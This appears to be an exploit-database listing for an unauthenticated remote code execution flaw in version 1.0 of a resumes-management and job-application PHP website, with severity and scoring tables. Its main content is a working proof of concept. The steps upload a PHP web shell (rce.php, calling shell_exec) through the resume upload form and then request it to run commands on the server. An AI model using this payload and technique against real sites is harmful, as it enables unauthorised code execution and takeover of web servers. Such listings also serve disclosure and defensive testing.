Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
N/A | CWE-434 | $500 | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unknown | High | Remote | 2021-01-04 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:6.8/AV:N/AC:M/Au:N/C:P/I:P/A:P | 0.82112 | 0.80128 |
# Exploit Title: Resumes-management-and-job-application-website unauthenticated RCE # Date: 3/1/2021 # Exploit Author: Arnav Tripathy # Vendor Homepage: https://egavilanmedia.com # Software Link: https://egavilanmedia.com/resumes-management-and-job-application-website/ # Version: 1.0 # Tested on: linux/lamp Submit rce.php in resume file upload unauthenticated.Contents of rce.php <?php $output = shell_exec('whoami'); echo "<h1>$output</h1>"; ?> Navigate to http://localhost/Resumes Management and Job Application Website/files/rce.php You will get the output of whoami
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.